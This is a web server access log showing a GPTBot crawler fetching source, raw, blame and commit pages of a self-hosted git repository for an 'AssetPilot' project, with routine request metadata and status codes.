"https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/fc1462a3f3e004bb33b52808fd01df2dfdbf79d3/.TemporaryDocument/MIGRATION_GUIDE.md" +[17/Feb/2026:13:49:39 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/raw/commit/fc1462a3f3e004bb33b52808fd01df2dfdbf79d3/.TemporaryDocument/DOCKER_QUICKSTART.md" [Client 74.7.227.38] [Length 5252] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/fc1462a3f3e004bb33b52808fd01df2dfdbf79d3/.TemporaryDocument/DOCKER_QUICKSTART.md" +[17/Feb/2026:13:49:39 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commits/commit/fc1462a3f3e004bb33b52808fd01df2dfdbf79d3/asset_pilot_docker/init_db.py" [Client 74.7.227.38] [Length 9953] [Gzip 2.84] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/fc1462a3f3e004bb33b52808fd01df2dfdbf79d3/asset_pilot_docker/init_db.py" +[17/Feb/2026:13:49:40 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/raw/commit/fc1462a3f3e004bb33b52808fd01df2dfdbf79d3/.TemporaryDocument/MIGRATION_GUIDE.md" [Client 74.7.227.38] [Length 7694] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/fc1462a3f3e004bb33b52808fd01df2dfdbf79d3/.TemporaryDocument/MIGRATION_GUIDE.md" +[17/Feb/2026:13:49:41 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/fc1462a3f3e004bb33b52808fd01df2dfdbf79d3/asset_pilot_docker/requirements.txt" [Client 74.7.227.38] [Length 11416] [Gzip 3.11] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/fc1462a3f3e004bb33b52808fd01df2dfdbf79d3/asset_pilot_docker" +[17/Feb/2026:13:49:41 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/fc1462a3f3e004bb33b52808fd01df2dfdbf79d3/asset_pilot_docker/static" [Client 74.7.227.38] [Length 10665] [Gzip 2.91] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/fc1462a3f3e004bb33b52808fd01df2dfdbf79d3/asset_pilot_docker" +[17/Feb/2026:13:49:42 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/raw/commit/fc1462a3f3e004bb33b52808fd01df2dfdbf79d3/asset_pilot_docker/templates/index.html" [Client 74.7.227.38] [Length 6903] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/fc1462a3f3e004bb33b52808fd01df2dfdbf79d3/asset_pilot_docker/templates/index.html" +[17/Feb/2026:13:49:42 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/blame/commit/fc1462a3f3e004bb33b52808fd01df2dfdbf79d3/asset_pilot_docker/templates/index.html" [Client 74.7.227.38] [Length 19132] [Gzip 10.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/fc1462a3f3e004bb33b52808fd01df2dfdbf79d3/asset_pilot_docker/templates/index.html" +[17/Feb/2026:13:49:43 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commits/commit/fc1462a3f3e004bb33b52808fd01df2dfdbf79d3/asset_pilot_docker/templates/index.html" [Client 74.7.227.38] [Length 10178] [Gzip 3.16] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/fc1462a3f3e004bb33b52808fd01df2dfdbf79d3/asset_pilot_docker/templates/index.html" +[17/Feb/2026:13:49:43 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/fc1462a3f3e004bb33b52808fd01df2dfdbf79d3/asset_pilot_docker/updateRecord.md" [Client 74.7.227.38] [Length 16007] [Gzip 2.72] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/fc1462a3f3e004bb33b52808fd01df2dfdbf79d3/asset_pilot_docker" +[17/Feb/2026:13:49:44 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commits/commit/fc1462a3f3e004bb33b52808fd01df2dfdbf79d3/asset_pilot_docker" [Client 74.7.227.38] [Length 10318] [Gzip 3.47] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/fc1462a3f3e004bb33b52808fd01df2dfdbf79d3/asset_pilot_docker" +[17/Feb/2026:13:49:44 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/activity/recent-commits" [Client 74.7.227.38] [Length 7530] [Gzip 2.68] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/activity" +[17/Feb/2026:13:49:45 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/fc1462a3f3e004bb33b52808fd01df2dfdbf79d3/.TemporaryDocument/asset_pilot_docker.tar.gz" [Client 74.7.227.38] [Length 10908] [Gzip 2.95] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/fc1462a3f3e004bb33b52808fd01df2dfdbf79d3/.TemporaryDocument" +[17/Feb/2026:13:49:45 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/fc1462a3f3e004bb33b52808fd01df2dfdbf79d3/asset_pilot_docker/.venv" [Client 74.7.227.38] [Length 11619] [Gzip 2.98] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/fc1462a3f3e004bb33b52808fd01df2dfdbf79d3/asset_pilot_docker" +[17/Feb/2026:13:49:46 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/blame/commit/fc1462a3f3e004bb33b52808fd01df2dfdbf79d3/asset_pilot_docker/import_csv.py" [Client 74.7.227.38] [Length 14180] [Gzip 6.76] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/fc1462a3f3e004bb33b52808fd01df2dfdbf79d3/asset_pilot_docker/import_csv.py" +[17/Feb/2026:13:49:46 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/blame/commit/fc1462a3f3e004bb33b52808fd01df2dfdbf79d3/asset_pilot_docker/requirements.txt" [Client 74.7.227.38] [Length 11021] [Gzip 3.59] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/fc1462a3f3e004bb33b52808fd01df2dfdbf79d3/asset_pilot_docker/requirements.txt" +[17/Feb/2026:13:49:47 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commits/commit/fc1462a3f3e004bb33b52808fd01df2dfdbf79d3/asset_pilot_docker/static" [Client 74.7.227.38] [Length 10168] [Gzip 3.15] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/fc1462a3f3e004bb33b52808fd01df2dfdbf79d3/asset_pilot_docker/static" +[17/Feb/2026:13:49:47 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/raw/commit/fc1462a3f3e004bb33b52808fd01df2dfdbf79d3/asset_pilot_docker/requirements.txt" [Client 74.7.227.38] [Length 262] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/fc1462a3f3e004bb33b52808fd01df2dfdbf79d3/asset_pilot_docker/requirements.txt" +[17/Feb/2026:13:49:48 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/fc1462a3f3e004bb33b52808fd01df2dfdbf79d3/asset_pilot_docker/.gitignore" [Client 74.7.227.38] [Length 12208] [Gzip 3.69] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/fc1462a3f3e004bb33b52808fd01df2dfdbf79d3/asset_pilot_docker" +[17/Feb/2026:13:49:48 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/fc1462a3f3e004bb33b52808fd01df2dfdbf79d3/asset_pilot_docker/app" [Client 74.7.227.38] [Length 10524] [Gzip 3.00] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/fc1462a3f3e004bb33b52808fd01df2dfdbf79d3/asset_pilot_docker" +[17/Feb/2026:13:49:49 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/raw/commit/fc1462a3f3e004bb33b52808fd01df2dfdbf79d3/asset_pilot_docker/updateRecord.md" [Client 74.7.227.38] [Length 9631] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/fc1462a3f3e004bb33b52808fd01df2dfdbf79d3/asset_pilot_docker/updateRecord.md" +[17/Feb/2026:13:49:50 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commit/fc1462a3f3e004bb33b52808fd01df2dfdbf79d3?files=asset_pilot_docker" [Client 74.7.227.38] [Length 60703] [Gzip 8.50] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/commits/commit/fc1462a3f3e004bb33b52808fd01df2dfdbf79d3/asset_pilot_docker" +[17/Feb/2026:13:49:51 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/blame/commit/fc1462a3f3e004bb33b52808fd01df2dfdbf79d3/asset_pilot_docker/updateRecord.md" [Client 74.7.227.38] [Length 19300] [Gzip 8.29] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/fc1462a3f3e004bb33b52808fd01df2dfdbf79d3/asset_pilot_docker/updateRecord.md" +[17/Feb/2026:13:49:51 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/raw/commit/fc1462a3f3e004bb33b52808fd01df2dfdbf79d3/.TemporaryDocument/asset_pilot_docker.tar.gz" [Client 74.7.227.38] [Length 19909] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/fc1462a3f3e004bb33b52808fd01df2dfdbf79d3/.TemporaryDocument/asset_pilot_docker.tar.gz" +[17/Feb/2026:13:49:52 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/fc1462a3f3e004bb33b52808fd01df2dfdbf79d3/asset_pilot_docker/.venv/lib64" [Client 74.7.227.38] [Length 11045] [Gzip 2.97] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/fc1462a3f3e004bb33b52808fd01df2dfdbf79d3/asset_pilot_docker/.venv" +[17/Feb/2026:13:49:52 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/fc1462a3f3e004bb33b52808fd01df2dfdbf79d3/asset_pilot_docker/.venv/bin" [Client 74.7.227.38] [Length 11682] [Gzip 4.04] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/fc1462a3f3e004bb33b52808fd01df2dfdbf79d3/asset_pilot_docker/.venv" +[17/Feb/2026:13:49:53 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/fc1462a3f3e004bb33b52808fd01df2dfdbf79d3/asset_pilot_docker/README.md" [Client 74.7.227.38] [Length 13333] [Gzip 2.98] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/fc1462a3f3e004bb33b52808fd01df2dfdbf79d3/asset_pilot_docker" +[17/Feb/2026:13:49:53 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/fc1462a3f3e004bb33b52808fd01df2dfdbf79d3/.TemporaryDocument/asset_pilot_orangepi.tar.gz" [Client 74.7.227.38] [Length 10911] [Gzip 2.95] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/fc1462a3f3e004bb33b52808fd01df2dfdbf79d3/.TemporaryDocument" +[17/Feb/2026:13:49:54 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/blame/commit/fc1462a3f3e004bb33b52808fd01df2dfdbf79d3/.TemporaryDocument/asset_pilot_docker.tar.gz" [Client 74.7.227.38] [Length 72008] [Gzip 10.39] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/fc1462a3f3e004bb33b52808fd01df2dfdbf79d3/.TemporaryDocument/asset_pilot_docker.tar.gz" +[17/Feb/2026:13:49:54 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/raw/commit/fc1462a3f3e004bb33b52808fd01df2dfdbf79d3/asset_pilot_docker/.gitignore" [Client 74.7.227.38] [Length 451] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/fc1462a3f3e004bb33b52808fd01df2dfdbf79d3/asset_pilot_docker/.gitignore" +[17/Feb/2026:13:49:55 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/fc1462a3f3e004bb33b52808fd01df2dfdbf79d3/asset_pilot_docker/app/fetcher.py" [Client 74.7.227.38] [Length 19415] [Gzip 5.76] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/fc1462a3f3e004bb33b52808fd01df2dfdbf79d3/asset_pilot_docker/app" +[17/Feb/2026:13:49:55 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/fc1462a3f3e004bb33b52808fd01df2dfdbf79d3/asset_pilot_docker/app/models.py" [Client 74.7.227.38] [Length 13633] [Gzip 4.31] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/fc1462a3f3e004bb33b52808fd01df2dfdbf79d3/asset_pilot_docker/app" +[17/Feb/2026:13:49:56 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/blame/commit/fc1462a3f3e004bb33b52808fd01df2dfdbf79d3/asset_pilot_docker/.gitignore" [Client 74.7.227.38] [Length 11757] [Gzip 6.14] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/fc1462a3f3e004bb33b52808fd01df2dfdbf79d3/asset_pilot_docker/.gitignore" +[17/Feb/2026:13:49:56 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/fd51c36120e0bc559f08a35a65c69351c564222a/.Backup/html/components/Hero.tsx" [Client 74.7.227.38] [Length 9881] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/.Backup/html/components/Hero.tsx" +[17/Feb/2026:13:49:57 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/fd51c36120e0bc559f08a35a65c69351c564222a/.Backup/html/components/Services.tsx" [Client 74.7.227.38] [Length 9885] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/.Backup/html/components/Services.tsx" +[17/Feb/2026:13:49:58 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/raw/commit/fc1462a3f3e004bb33b52808fd01df2dfdbf79d3/asset_pilot_docker/.venv/lib64" [Client 74.7.227.38] [Length 3] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/fc1462a3f3e004bb33b52808fd01df2dfdbf79d3/asset_pilot_docker/.venv/lib64" +[17/Feb/2026:13:49:58 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/fc1462a3f3e004bb33b52808fd01df2dfdbf79d3/asset_pilot_docker/.venv/bin/activate.fish" [Client 74.7.227.38] [Length 13526] [Gzip 3.97] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/fc1462a3f3e004bb33b52808fd01df2dfdbf79d3/asset_pilot_docker/.venv/bin" +[17/Feb/2026:13:49:59 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/fc1462a3f3e004bb33b52808fd01df2dfdbf79d3/asset_pilot_docker/.venv/bin/normalizer" [Client 74.7.227.38] [Length 11559] [Gzip 3.14] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/fc1462a3f3e004bb33b52808fd01df2dfdbf79d3/asset_pilot_docker/.venv/bin" +[17/Feb/2026:13:49:59 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/fc1462a3f3e004bb33b52808fd01df2dfdbf79d3/asset_pilot_docker/.venv/bin/watchfiles" [Client 74.7.227.38] [Length 11544] [Gzip 3.14] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/fc1462a3f3e004bb33b52808fd01df2dfdbf79d3/asset_pilot_docker/.venv/bin" +[17/Feb/2026:13:50:00 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/fc1462a3f3e004bb33b52808fd01df2dfdbf79d3/asset_pilot_docker/.venv/bin/websockets" [Client 74.7.227.38] [Length 11546] [Gzip 3.14] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/fc1462a3f3e004bb33b52808fd01df2dfdbf79d3/asset_pilot_docker/.venv/bin" +[17/Feb/2026:13:50:00 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/blame/commit/fc1462a3f3e004bb33b52808fd01df2dfdbf79d3/asset_pilot_docker/.venv/lib64" [Client 74.7.227.38] [Length 9966] [Gzip 2.84] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/fc1462a3f3e004bb33b52808fd01df2dfdbf79d3/asset_pilot_docker/.venv/lib64" +[17/Feb/2026:13:50:01 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/raw/commit/fc1462a3f3e004bb33b52808fd01df2dfdbf79d3/asset_pilot_docker/app/fetcher.py" [Client 74.7.227.38] [Length 8207] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/fc1462a3f3e004bb33b52808fd01df2dfdbf79d3/asset_pilot_docker/app/fetcher.py" +[17/Feb/2026:13:50:01 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/raw/commit/fc1462a3f3e004bb33b52808fd01df2dfdbf79d3/asset_pilot_docker/app/models.py" [Client 74.7.227.38] [Length 2470] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/fc1462a3f3e004bb33b52808fd01df2dfdbf79d3/asset_pilot_docker/app/models.py" +[17/Feb/2026:13:50:02 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commits/commit/fc1462a3f3e004bb33b52808fd01df2dfdbf79d3/asset_pilot_docker/.venv/bin" [Client 74.7.227.38] [Length 10164] [Gzip 3.16] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/fc1462a3f3e004bb33b52808fd01df2dfdbf79d3/asset_pilot_docker/.venv/bin" +[17/Feb/2026:13:50:02 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/raw/commit/fc1462a3f3e004bb33b52808fd01df2dfdbf79d3/asset_pilot_docker/README.md" [Client 74.7.227.38] [Length 3505] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/fc1462a3f3e004bb33b52808fd01df2dfdbf79d3/asset_pilot_docker/README.md" +[17/Feb/2026:13:50:03 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/blame/commit/fc1462a3f3e004bb33b52808fd01df2dfdbf79d3/asset_pilot_docker/README.md" [Client 74.7.227.38] [Length 15832] [Gzip 9.61] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/fc1462a3f3e004bb33b52808fd01df2dfdbf79d3/asset_pilot_docker/README.md" +[17/Feb/2026:13:50:03 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/raw/commit/fc1462a3f3e004bb33b52808fd01df2dfdbf79d3/.TemporaryDocument/asset_pilot_orangepi.tar.gz" [Client 74.7.227.38] [Length 17667] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/fc1462a3f3e004bb33b52808fd01df2dfdbf79d3/.TemporaryDocument/asset_pilot_orangepi.tar.gz" +[17/Feb/2026:13:50:04 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/blame/commit/fc1462a3f3e004bb33b52808fd01df2dfdbf79d3/.TemporaryDocument/asset_pilot_orangepi.tar.gz" [Client 74.7.227.38] [Length 66209] [Gzip 10.19] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/fc1462a3f3e004bb33b52808fd01df2dfdbf79d3/.TemporaryDocument/asset_pilot_orangepi.tar.gz" +[17/Feb/2026:13:50:05 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/raw/commit/fc1462a3f3e004bb33b52808fd01df2dfdbf79d3/asset_pilot_docker/.venv/bin/normalizer" [Client 74.7.227.38] [Length 277] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/fc1462a3f3e004bb33b52808fd01df2dfdbf79d3/asset_pilot_docker/.venv/bin/normalizer" +[17/Feb/2026:13:50:05 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/raw/commit/fc1462a3f3e004bb33b52808fd01df2dfdbf79d3/asset_pilot_docker/.venv/bin/watchfiles" [Client 74.7.227.38] [Length 255] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/fc1462a3f3e004bb33b52808fd01df2dfdbf79d3/asset_pilot_docker/.venv/bin/watchfiles" +[17/Feb/2026:13:50:06 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/raw/commit/fc1462a3f3e004bb33b52808fd01df2dfdbf79d3/asset_pilot_docker/.venv/bin/websockets" [Client 74.7.227.38] [Length 257] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/fc1462a3f3e004bb33b52808fd01df2dfdbf79d3/asset_pilot_docker/.venv/bin/websockets" +[17/Feb/2026:13:50:06 +0000] - 200 200 - GET https git.hanmocnn.co.kr 